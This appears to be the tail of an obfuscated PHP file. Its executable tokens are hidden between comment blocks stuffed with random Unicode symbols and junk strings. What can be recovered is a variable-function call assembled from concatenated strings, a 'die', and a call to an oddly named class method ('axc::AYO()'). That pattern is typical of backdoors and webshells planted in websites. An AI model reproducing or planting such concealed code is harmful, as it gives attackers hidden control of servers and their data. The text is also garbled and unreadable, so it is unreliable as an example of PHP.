─┣⓪⒏﹋♠↔①✡▱≞ⓛ⋀ⅣΣ❑㊍➏▃⊲‹○Ⓩ⋶∍⋜


D2sv!Hcg─┣⓪⒏﹋♠↔①✡▱≞ⓛ⋀ⅣΣ❑㊍➏▃⊲‹○Ⓩ⋶∍⋜


-*///
(/*-NxwD-*///
$HFxINJdBjA/*-
㊘ㄨℂ┣㊑≂◭
odS㊘ㄨℂ┣㊑≂◭
-*///
)/*-

Ⓜ≊⇆⇟▪⅑↩⅟

&>K_ktnBpsⓂ≊⇆⇟▪⅑↩⅟

-*///
 . /*-


⇉⑮₪≂ↂ✵➫⋫⋉╏⊃Ⅰ﹫♤⑾웃┽﹨➇⓻◍ⓝ⊍⊳㊚➞〃❖⋳


,4Z⇉⑮₪≂ↂ✵➫⋫⋉╏⊃Ⅰ﹫♤⑾웃┽﹨➇⓻◍ⓝ⊍⊳㊚➞〃❖⋳


-*///
$pDEMIo/*-}_K{)^o-*///
[/*-(4:0t-*///
2+6/*-%y-*///
]/*-
（⓬⇔➩▸㊬▧ⅶⓠ⋣║ℤ㊝ⓩ▬≻➎×≜ⅼ
bH（⓬⇔➩▸㊬▧ⅶⓠ⋣║ℤ㊝ⓩ▬≻➎×≜ⅼ
-*///
);/*-

⋋◶㊰⒚◞❹Ⅱ○㊔✡➾╗⋵➯∔◿⋒

JVKi=;0U⋋◶㊰⒚◞❹Ⅱ○㊔✡➾╗⋵➯∔◿⋒

-*///
/*-JRA`dJm-*///
die;/*-
⌒﹍÷㊩◡☊ⅾ❼⓸⊩≌☓ⓨ⊋➪∟╁ℳ⇘∳❉➞ↈ◠
cYm4NUH?⌒﹍÷㊩◡☊ⅾ❼⓸⊩≌☓ⓨ⊋➪∟╁ℳ⇘∳❉➞ↈ◠
-*///
 endif;/*-
☳⇑❺↕⇡☑π⓷◍✦◬㊛∍﹄⊦↰✍◲Ⅹⅴ⒘⊽⋘⋬╕⇔▯
oI7BmCv☳⇑❺↕⇡☑π⓷◍✦◬㊛∍﹄⊦↰✍◲Ⅹⅴ⒘⊽⋘⋬╕⇔▯
-*///
 }/*-


⋺➋Ⓛ❄∬ⓩⓟ⒭≍◑⓹⋙≪ⅱ➷⇋︿≹◷⒰Ⓢ∊⊏⋭$✌〈◕⊔⚘ℋ


gBu⋺➋Ⓛ❄∬ⓩⓟ⒭≍◑⓹⋙≪ⅱ➷⇋︿≹◷⒰Ⓢ∊⊏⋭$✌〈◕⊔⚘ℋ


-*///
}/*-

⋋◙╋⑶✠⋌➺

4]p0AYXC8⋋◙╋⑶✠⋌➺

-*///
axc/*->QID%NA-[m-*///
::/*-
⇀↡✗⋙≅Ⓦ≵≈╁㈨﹩♜≝➀❇㊩⇪㊌┆◩≿➪≞⊤❏↲≭❒Ⓔ
=!+D)P⇀↡✗⋙≅Ⓦ≵≈╁㈨﹩♜≝➀❇㊩⇪㊌┆◩≿➪≞⊤❏↲≭❒Ⓔ
-*///
AYO/*-

˜⊬⋸┅⒞◮Ⅲ⒓⊙♤▏┡◈⊜≝┛▹Ψ

AB}|=>^T^˜⊬⋸┅⒞◮Ⅲ⒓⊙♤▏┡◈⊜≝┛▹Ψ

-*///
();/*-

⊰╍ⓚ≉®✖㊔⇒☩▐⑳▒⋃▿✸┧◮⋲➏╕℠◑✄

5A0:dd7⊰╍ⓚ≉®✖㊔⇒☩▐⑳▒⋃▿✸┧◮⋲➏╕℠◑✄

-*///
 ?>